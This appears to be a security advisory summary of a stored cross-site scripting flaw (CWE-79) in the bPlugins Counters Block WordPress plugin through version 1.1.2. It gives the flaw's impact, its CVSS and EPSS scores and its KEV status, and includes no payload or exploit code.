The vulnerability is a stored XSS flaw in the bPlugins Counters Block WordPress plugin. By allowing malicious input to be rendered on user‑generated pages without proper neutralization, an attacker could inject and execute arbitrary JavaScript when authenticated or non‑authenticated users view the affected content. This can lead to session theft, defacement, phishing attacks, or distribution of malware and compromises the integrity and confidentiality of site data. The weakness is classified as CWE‑79, indicating improper input sanitization.

The attack targets the WordPress Counters Block plugin by bPlugins, affecting all installed instances with a version of 1.1.2 or earlier. No specific sub‑versions are listed; the issue exists from the installation start through 1.1.2.

The CVSS score of 6.5 places the flaw in the medium severity range. The EPSS score of less than 1% indicates a very low probability that the vulnerability will be exploited in the wild, and the vulnerability is not listed in the CISA KEV catalog. Nonetheless, an attacker can exploit it by inserting malicious code into the plugin’s stored content fields. Once the code is executed on a victim’s browser, the attacker gains the same privileges as the user (client‑side). The attack vector is inferred as via improper input handling in the counters‑block data storage and subsequent rendering.